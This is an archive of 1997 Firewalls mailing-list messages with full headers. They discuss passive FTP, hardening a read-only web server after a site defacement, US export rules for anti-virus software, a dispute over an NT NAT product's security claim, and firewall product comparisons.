Organization: http://www.dreamscape.com/matkoski/netcon/ X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Untrusted vs. trusted network security References: <199701010900.BAA10884@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul Ferguson wrote: > Ditto. PASV FTP works fine, lasts a long time. Even has growing > client support. :-) > Where can I find info on PASV mode? -- Thanks! -steve. matkoski@dreamscape.com From firewalls-owner Thu Jan 2 17:13:06 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22333 for firewalls-outgoing; Thu, 2 Jan 1997 16:35:19 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA22326 for ; Thu, 2 Jan 1997 16:35:11 -0800 (PST) Received: by hidata.com; id AA11043; Thu, 2 Jan 97 16:34:46 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma011039; Thu, 2 Jan 97 16:34:42 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8CB.CD6DDF40@oscntsrv.hidata.com>; Thu, 2 Jan 1997 16:41:29 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: RE: Read-only Web Site (was AF hack) Date: Thu, 2 Jan 1997 16:41:27 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At first glance that appears to be an easily hacked site. Maybe with deep thought one can imagine security working for a while... On second glance, security on that configuration still appears hackable. That said, most of what goes on in this list is what I called in my L.A. Street racing days as 'bench racing' ("yea, I added a chrome shift knob and got five more horsepower"). When the pink slips come out, you know there's some serious hardware inside, but until then, it's mostly theoretical talk about what works and what doesn't until you get a F-WOS (Fed.-Web Oh Sh_t). The following contains bench racing. ;) It is not easy to lock all of the incoming services from a specific port. Disabling IP forwarding is a start, but if a system gateways to other systems inside, or to itself without a strong authentication mechanism, it is still vunerable. You also need code smart enough to recognize trusted addresses coming in from the wrong port. Maybe your 7500 has a weak point, a vty password that actually is a word. The Cisco is close enough to successfully spoof trusted ip addresses. Lets say someone on your internal network xxx.185.2.0(?) opened a HTTP connection out to a site. Wouldn't an Active-X/Java/Javascript application - 'some script' be able to write to/collect data on a NFS-mounted drive which happens to be your webserver? A script could run commands to view network connections on an internal DOS or UNIX client, send the data back as cookies, processes that data (grep for '/docs', or '/ns-home', or '/wwwroot') then have the browser background cache a new index.html document to that location. Maybe that new Trek screensaver from usenet does the same thing, or runs a '90s' version of 'Jive' on your index.html/default.htm page. An outside programmer could see some instant gratification from your home page. Point is, I think your configuration needs more protection. Bill Stout On Thursday, January 02, 1997 10:41 AM, mcnabb@argus.cu-online.com wrote: > The web server has two network connections, but has IP forwarding > disabled. Processes coming in from one network see all file systems > as read-only (making /tmp RO is an option), and there is no mechanism > for bypassing that, even if the process is root. All device special > files are complete inaccessible to all processes and all users -- also > mknod(2) is disabled. If a user comes in from the other network, > he/she can access the system normally, except that UID 0 (root) is > treated as a normal account in terms of OS privilege, so attacks from > this direction are also more tightly controlled (special programs > are provided to manage the system instead of using a special account > such as root). > > +------------+ > <-------------->| Secured |<--------------> > internal network | Web Site | Internet/PublicNet > (RW file systems) +------------+ (RO file systems) > > When a Solaris host (x86 or SPARC) has been updated with this level > of security, you can still use the r* commands, telnet, ftp, and > even NFS from either side. You can have the RO restriction be done > on a per-file basis as well, so you can be creative about your setup. From firewalls-owner Thu Jan 2 17:14:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24591 for firewalls-outgoing; Thu, 2 Jan 1997 16:57:59 -0800 (PST) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24571 for ; Thu, 2 Jan 1997 16:57:50 -0800 (PST) Received: from quinn-pc (slip-11-10.slip.shore.net [204.167.104.210]) by relay1.shore.net (8.8.3/8.8.3) with SMTP id TAA21902; Thu, 2 Jan 1997 19:54:42 -0500 (EST) Message-ID: <32CC580D.2A58@shore.net> Date: Thu, 02 Jan 1997 19:51:25 -0500 From: Vin McLellan Organization: The Privacy Guild X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: The Looong Reach of US Crypto-Export Controls (?) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Buried deep in the new Federal regs controlling crypto exports is a little gem of potential interest to this List. Plucked from an extended discussion on the the Cypherpunks List: > >But it _specifically_ restricts virus-checkers (and, also, it would seem, backup programs, but that could be stretching it): > >ECCN 5D002.c.3: > ># ``Software'' designed or modified to protect against malicious > ># computer damage, e.g., viruses Virus checkers, programs like Tripwire, and (some, many, or all?) US firewall products are reported to be export controlled under the new regs... and subject to sale-by-sale license and export approval. Regardless of whether the software program uses crypto or not. True? Software products which use Java applets and ActiveX controls (if they also have anti-virus components, likely to be demanded by users, at least in Europe) would also apparently fall within the new reg's hyperactive scope. Suerte, _Vin (PS: Any estimates of sales, market share, or jobs which will be sacrificed if such a provision is enforced? Could the possibility of it being enforced mute the industry's voice in public debate about a domestic GAK law in '97? Any volunteers to explain to Congressmen that many great programmers are born and bred outside US jurisdictions?) From firewalls-owner Thu Jan 2 17:16:10 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA23397 for firewalls-outgoing; Thu, 2 Jan 1997 16:46:18 -0800 (PST) Received: from nova.dreamscape.com (nova.dreamscape.com [206.64.128.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA23351 for ; Thu, 2 Jan 1997 16:46:04 -0800 (PST) Received: from garcia (sb9.dreamscape.com [206.114.183.170]) by nova.dreamscape.com (8.8.4/8.8.4) with SMTP id TAA23745 for ; Thu, 2 Jan 1997 19:45:56 -0500 (EST) Message-ID: <32CC5666.647@future.dreamscape.com> Date: Thu, 02 Jan 1997 19:44:22 -0500 From: Steve Matkoski Reply-To: makoski@future.dreamscape.com Organization: http://www.dreamscape.com/matkoski/netcon/ X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: internal filtering router - filter config? References: <199701022212.OAA08595@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What type of things would you filter on the internal router? or even the external router? I am going to be installing a firewall real soon and would really appreciate any help. -steve. matkoski@dreamscape.com From firewalls-owner Thu Jan 2 17:38:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22802 for firewalls-outgoing; Thu, 2 Jan 1997 16:41:03 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA22767 for ; Thu, 2 Jan 1997 16:40:43 -0800 (PST) Received: by hidata.com; id AA11058; Thu, 2 Jan 97 16:40:16 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma011056; Thu, 2 Jan 97 16:39:54 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8CC.8767BC40@oscntsrv.hidata.com>; Thu, 2 Jan 1997 16:46:41 -0800 Message-Id: From: "Stout, Bill" To: "'firewalls@GreatCircle.COM'" Subject: RE: Air Force Web Site Hacked -Reply Date: Thu, 2 Jan 1997 16:46:40 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why not make a webserver serve properly PGP-tagged documents only? Or did someone already invent that one too? Bill Stout From firewalls-owner Thu Jan 2 17:54:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22659 for firewalls-outgoing; Thu, 2 Jan 1997 16:39:20 -0800 (PST) Received: from news.rc.on.ca ([207.176.151.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA22630 for ; Thu, 2 Jan 1997 16:39:06 -0800 (PST) Received: by mail.rc.on.ca with Internet Mail Service (5.0.1389.3) id <01BBF8E4.31FB8620@mail.rc.on.ca>; Thu, 2 Jan 1997 19:36:05 -0500 Message-ID: <41FDA823FC5AD011A0970000E8D5C66771A2@mail.rc.on.ca> From: Russ To: "'Jamie Thain'" , firewalls@greatcircle.com Cc: "'info@on.com'" Subject: RE: NT NAT Date: Thu, 2 Jan 1997 19:36:05 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1389.3) Content-Type: text/plain; charset="iso-8859-1" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >There is now an NT NAT. http://www.on.com. I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides; .Protects your internal IP servers and workstations from Internet hackers Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away complete with Firewalls, we could have all saved ourselves a whole lot of effort and time. Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money. Maybe their marketing staff is made up of rejected Microsoft marketeers...??? Cheers, Russ R.C. Consulting, Inc. - NT/Internet Security Consulting From firewalls-owner Thu Jan 2 18:21:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA02408 for firewalls-outgoing; Thu, 2 Jan 1997 18:01:47 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA02377 for ; Thu, 2 Jan 1997 18:01:36 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id SAA20541; Thu, 2 Jan 1997 18:00:27 -0800 (PST) Message-Id: <3.0.32.19970102210022.006a4e60@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 02 Jan 1997 21:00:24 -0500 To: makoski@future.dreamscape.com From: Paul Ferguson Subject: Re: Untrusted vs. trusted network security Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk See: RFC1579, 'Firewall-Friendly FTP', S. Bellovin, February 1994. - paul At 07:16 PM 1/2/97 -0500, Steve Matkoski wrote: >Paul Ferguson wrote: > >> Ditto. PASV FTP works fine, lasts a long time. Even has growing >> client support. :-) >> >Where can I find info on PASV mode? > >-- > >Thanks! >-steve. >matkoski@dreamscape.com > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 2 20:03:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11516 for firewalls-outgoing; Thu, 2 Jan 1997 19:55:18 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA11506 for ; Thu, 2 Jan 1997 19:55:10 -0800 (PST) Received: from ns1.ntshop.com by relay6.UU.NET with ESMTP (peer crosschecked as: [207.91.166.2]) id QQbwvn07502; Thu, 2 Jan 1997 22:53:55 -0500 (EST) Received: from beast.ntshop.net ([207.91.166.3]) by ns1.ntshop.com (post.office MTA v2.0 0813 ID# 153-13296) with SMTP id AAA248; Thu, 2 Jan 1997 21:44:17 -0600 Received: by beast.ntshop.net with Microsoft Mail id <01BBF8F5.E246FE40@beast.ntshop.net>; Thu, 2 Jan 1997 21:42:42 -0600 Message-ID: <01BBF8F5.E246FE40@beast.ntshop.net> From: Mark Joseph Edwards To: "'Russ'" Cc: "'firewalls@greatcircle.com'" Subject: RE: NT NAT Date: Thu, 2 Jan 1997 21:42:38 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok - I visited this site, and read every single word about OnGuard. I = don't see anything on this site AT ALL that insinuates that this product = -- by itself -- is all the protection your network needs. Nothing. Zip. = Nada. Zilch. They do, however, quite clearly, stress over and over that this product = is an IP address translator (NAT). There IS one teeny tiny short = sentence that says "Protects your internal IP servers and workstations = from Internet hackers" and that's it. This doesn't say "we're a cure = all" or "we're all you need", and it doesn't violate any "Truth in = Advertising" ethics either. Russ wrote - "Never before have I ever seen anyone attempt to claim that NAT by = itself makes your entire internal network secure from Internet hackers, = but finally someone has actually done it." WRONG RUSS -- WRONG WRONG WRONG. HEY, IT DOESNT SAY THAT IT DOES! To = say the least, your comments are UNFAIR. And, your cheap stab at MS.....geeez man, what's come over you? This list doesn't need that type of post, ya know?=20 mje -----Original Message----- From: Russ [SMTP:Russ.Cooper@RC.on.ca] Sent: Thursday, January 02, 1997 6:36 PM To: 'Jamie Thain'; firewalls@greatcircle.com Cc: 'info@on.com' Subject: RE: NT NAT=20 >There is now an NT NAT. http://www.on.com. I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides; .Protects your internal IP servers and workstations from Internet hackers=20 Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away complete with Firewalls, we could have all saved ourselves a whole lot of effort and time. Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money. Maybe their marketing staff is made up of rejected Microsoft marketeers...??? Cheers, Russ R.C. Consulting, Inc. - NT/Internet Security Consulting From firewalls-owner Thu Jan 2 20:14:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11643 for firewalls-outgoing; Thu, 2 Jan 1997 19:58:30 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA11636 for ; Thu, 2 Jan 1997 19:58:23 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id TAA23463; Thu, 2 Jan 1997 19:57:03 -0800 Received: from upsmot01.msn.com(204.95.110.78) by mycroft via smap (V1.3mjr) id sma023459; Thu Jan 2 19:56:26 1997 Received: from upmajb06 ([204.95.110.89]) by upsmot01.msn.com (8.6.8.1/Configuration 4) with SMTP id TAA02157 for ; Thu, 2 Jan 1997 19:48:34 -0800 Date: Fri, 3 Jan 97 06:38:54 UT From: "Tijani CHAOUCH BOURAOUI" Message-Id: To: Firewalls@GreatCircle.COM Subject: RE: Firewalls-Digest V5 #699 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- From: firewalls-digest-owner@GreatCircle.COM on behalf of Firewalls-Digest Sent: Thursday, January 02, 1997 1:00 AM To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #699 Firewalls-Digest Thursday, January 2 1997 Volume 05 : Number 699 In this issue: Re: Christopher Klaus and ISS RE: Air Force Web Site Hacked Re: DNS Proxy and Internal Root Name Server See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST) From: Todd Graham Lewis Subject: Re: Christopher Klaus and ISS On Tue, 31 Dec 1996, Robert Hanson wrote: > no disrespect intended to you Todd, yet.... > > kill! maime! shoot! my goodness... we are all capitalist pigs... what > makes anyone better than anyone else standing next to them... I not only like corporations, I work for one. Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000." What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier. (BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.) __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 ------------------------------ Date: Thu, 2 Jan 1997 13:50:18 +0900 From: "Jason T. Luttgens" Subject: RE: Air Force Web Site Hacked Why not get Practical Unix and Internet Security from O'Reilly and do what is says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault...... - ---------- From: Norm Laudermilch[SMTP:norm@UU.NET] Sent: Wednesday, January 01, 1997 8:57 AM To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked [from Michael Idengren:] > I don't know about the rest of you but I agree with the idea of putting a > webserver on a CD-ROM. [from Thomas Leitner:] > why not just put it on a separate disk which is mounted > read-only? [from Dale Drew:] > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT... Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step. I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though. Happy new year (2 minutes to go...), Norm - ---------------------------------------------------------------------- Have you cleaned your packet filter lately? - Josh Osborne - ---------------------------------------------------------------------- Norm Laudermilch E-mail: norm@uu.net Manager, Information Security Phone: 703-206-5952 UUNET Technologies, Inc. 3060 Williams Drive Fairfax, VA 22031-4648 - ---------------------------------------------------------------------- ------------------------------ Date: Thu, 02 Jan 1997 09:03:03 +0100 From: Jean-Francois ZWOBADA Subject: Re: DNS Proxy and Internal Root Name Server At 16:59 31/12/1996 -0500, R. McMahon wrote: >Background: >I am looking at setting up a DNS proxy using "forwarders" and "slave" >lines in by /etc/named.boot file as described in the "Building >Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do >this where I can maintain an internal Root name server. For resolution >of domain names outside the internal top-level domains, I would like the >proxy name server (which will have an "external" domain name) be the >only name server queried by the internal root name server and having >this proxy be the only host to query external name servers. (I would >set up UDP port 53 filtering on the router.) > >Problem: >One problem I thought of concerns the mitigation between the internal >root name server and the forwarders/slave lines. If a subordinate >domain name server queries the root name server for an "outside" domain, >how would it know to forward the query to the proxy (being that it is a >internal root name server)? I could have my subordinate top-level >domain name serves query the proxy directly by putting forwarders line >in it's /etc/named.boot, however, this would bypass the internal root >structure. It seems to be straight forward w/o an internal root name >server, however, I need to maintain these root name server. Can anyone >help. > >Thanks, > >rwm > The problem with an internal root server is that it wont take any account of your forwarders & slave options because it is said to be a root server. The only solution I think of is adding the noforward patch in the named daemons of the first level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower level nameserver would query it but would forward to your proxy for everything else. Hope this helps Jean-Francois PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...) ------------------------------ End of Firewalls-Digest V5 #699 ******************************* To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM": unsubscribe firewalls-digest If you want to subscribe or unsubscribe an address other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls": subscribe firewalls-digest local-firewalls@your.domain.net A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls". Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number). From firewalls-owner Thu Jan 2 20:44:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA13029 for firewalls-outgoing; Thu, 2 Jan 1997 20:36:26 -0800 (PST) Received: from cmn.cmn.net ([206.168.145.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA12980 for ; Thu, 2 Jan 1997 20:36:13 -0800 (PST) Received: (from uucp@localhost) by cmn.cmn.net (8.8.4/8.6.12) with UUCP id VAA01378 for firewalls@greatcircle.com; Thu, 2 Jan 1997 21:34:54 -0700 Received: from localhost (root@localhost) by gunshot.victim.com (8.8.4/8.6.12) with SMTP id VAA02466 for ; Thu, 2 Jan 1997 21:30:53 -0800 Date: Thu, 2 Jan 1997 21:30:52 -0800 (PST) From: Dave Pifke To: firewalls@greatcircle.com Subject: http://www.victim.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For all of you out there who cut and pasted the URL for the 'phf' hack, expect a nastygram in your postmaster's mailbox. I have a trojan /cgi-bin/phf program that automatically sends mail to root, postmaster, and abuse at your domain before returning a false 404 message. Somebody brought to my attention that a message went out over this list showing "victim.com" as an example site. It goes to show that you shouldn't believe everything you read. ;-) Reply to me directly, as I don't subscribe to this list. Ask nicely and I'll send you the source (in Perl). -- Dave Pifke, root@victim.com System Administrator/Network Grease Monkey Information Victim Technologies From firewalls-owner Thu Jan 2 21:33:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA18790 for firewalls-outgoing; Thu, 2 Jan 1997 21:25:24 -0800 (PST) Received: from www.uob.com.sg (www.uob.com.sg [203.120.52.254]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA18774 for ; Thu, 2 Jan 1997 21:25:12 -0800 (PST) Received: from novix ([202.42.213.254]) by www.uob.com.sg (post.office MTA v1.9.3 **** trial license expired ****) with SMTP id AAA171 for ; Fri, 3 Jan 1997 13:29:59 +0800 X-Sender: lawrenceting@www.uob.com.sg X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: lawrenceting@www.uob.com.sg (Lawrence Ting) Subject: Any Recommendations? Date: Fri, 3 Jan 1997 13:29:59 +0800 Message-ID: <19970103052958912.AAA171@novix> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good day, I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as a IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall while I have a hard time to distinguish a better choice between Blackhole and Gauntlet. As for Suncreen, it is a definite more expensive choice than the other two. Can someone pls do kindly share your expertise or comments or experience on the abv mentioned products in terms of their functionalities? Thanks in adv. Lawrence TING Network Security Officer From firewalls-owner Fri Jan 3 00:30:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA01611 for firewalls-outgoing; Fri, 3 Jan 1997 00:23:11 -0800 (PST) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA01591 for ; Fri, 3 Jan 1997 00:23:01 -0800 (PST) Received: from northshore.shore.net (root@shell1.shore.net [192.233.85.1]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id DAA09247; Fri, 3 Jan 1997 03:22:33 -0500 (EST) Received: from [206.243.166.124] (max1-124.mfs.shore.net [206.243.166.124]) by northshore.shore.net (8.8.3/8.8.3) with ESMTP id DAA02265; Fri, 3 Jan 1997 03:22:25 -0500 (EST) X-Sender: vin@shore.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 3 Jan 1997 03:22:17 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: The Looong Reach of US Crypto-Export Controls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I earlier posted a message which quoted a well-informed Netizen who claimed that the new US Federal ERA regs (which transfer control of many encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept) now explicitly forbid the unlicensed export of software "designed or modified to protect against malicious computer damage, e.g., viruses" (c.3., below) Tell the truth, I couldn't quite believe they had done it! (A whole new _class_ of export controls? Over very basic computer security tech, so vaguely described? Tucked into into the fine print of a regulatory rewrite which the Administration has widely touted as a "compromise" with market-hungry US Industry and concerned compsec professionals!?! And with the DC rumor mill full of claims that the heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK bill, not the NSA/DoD's spooky Infowar concerns.) Also, the fact that I had posted a citation of such import without having dug up the original doc myself bothered me. So, in the wee hours, I arose from my snug bed, kicked the sleeping PC awake, and burrowed into the Federal Register... hunting (as it turned out) for Supplement No. 2 to Part 774 of the ERA: "General Technology and Software Notes." (Please note that American citizens and U.S. firms and organizations have but _ten_ days left, see below, to submit their comments on this "Interim Final Rule" -- which already has the force of Law -- to Commerce and their Congressfolk. E-mail, phone, and fax numbers for US Senators and Congressmen are at: You might prefer to write a brief note for the US Mail; less than half the members of the US Congress have e-mail addresses. Which perhaps explains a little about how this silliness could happen;-) Here's the source code, so to speak: <> List of Items Controlled Unit: $ value Related Controls: NA Related Definitions: N/A Items: a. ``software'' specially designed or modified for the ``development'', ``production'' or ``use'' of equipment or ``software'' controlled by 5A002, 5B002 or 5D002. b. ``Software'' specially designed or modified to support ``technology'' controlled by 5E002. c. Specific ``software'' as follows: c.1. ``Software'' having the characteristics, or performing or simulating the functions of the equipment controlled by 5A002 or 5B002; Note: 5D002.c.1 includes controls key escrow encryption software transferred from the U.S. Munitions List following a case-by-case determination by the Department of State through the commodity jurisdiction procedure. See Sec. 742.15 of the EAR. c.2. ``Software'' to certify ``software'' controlled by 5D002.c.1; c.3. ``Software'' designed or modified to protect against malicious computer damage, e.g., viruses; Note: 5D002 does not control: a. ``Software'' required'' for the ``use'' of equipment excluded from control under the Note to 5A002. b. ``Software'' providing any of the functions of equipment excluded from control under the Note to 5A002. <> __Below: Info Header of the Document as Published__ [Federal Register: December 13, 1996 (Volume 61, Number 241)] [Rules and Regulations] [Page 65642-65467] >From the Federal Register Online via GPO Access [wais.access.gpo.gov] ======================================================================= ----------------------------------------------------------------------- DEPARTMENT OF COMMERCE Bureau of Export Administration 15 CFR Parts 734, 740, 742, 762 and 774 [Docket No. 960918265-6296-02] RIN 0694-AB09 Licensing of Key Escrow Encryption Equipment and Software AGENCY: Bureau of Export Administration, Commerce. ACTION: Interim final rule. ----------------------------------------------------------------------- This interim final rule amends the Export Administration Regulations (EAR) by imposing national security controls on Key escrow information security (encryption) equipment and software transferred from the U.S. Munitions List to the Commerce Control List following a commodity jurisdiction determination by the Department of State. This interim final rule also amends the EAR to exclude key escrow items from the de minimis provisions for items exported from abroad and to exclude key escrow encryption software from mass market eligibility. Further, key escrow encryption software is subject to the EAR even when made publicly available. DATES: Effective date. This rule is effective December 13, 1996. Comment date: Comments, should be submitted on or before January 13, 1997. ADDRESSES: Written comments should be sent to Nancy Crowe, Regulatory Policy Division, Office of Exporter Services, Bureau of Export Administration, Room 2705, 14th Street and Pennsylvania Avenue, N.W., Washington, D.C. 20230. -------------------------------------------------------------------------- <> Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 From firewalls-owner Fri Jan 3 01:29:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA03719 for firewalls-outgoing; Fri, 3 Jan 1997 00:59:46 -0800 (PST) Received: from news.rc.on.ca ([207.176.151.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA03688 for ; Fri, 3 Jan 1997 00:59:36 -0800 (PST) Received: by mail.rc.on.ca with Internet Mail Service (5.0.1389.3) id <01BBF92A.24780A50@mail.rc.on.ca>; Fri, 3 Jan 1997 03:56:47 -0500 Message-ID: <41FDA823FC5AD011A0970000E8D5C66771A6@mail.rc.on.ca> From: Russ To: "'Mark Joseph Edwards'" Cc: "'Firewalls Mailing List'" Subject: RE: NT NAT Date: Fri, 3 Jan 1997 03:56:45 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1389.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk They made the statement I quoted, I didn't. I quoted it precisely from their web page, and then added my commentary. What do you think they were trying to say when they said it "protects your internal IP servers and workstations from Internet hackers", if not that it COMPLETELY protects them? How difficult would it have been to say that it "adds protection..."? 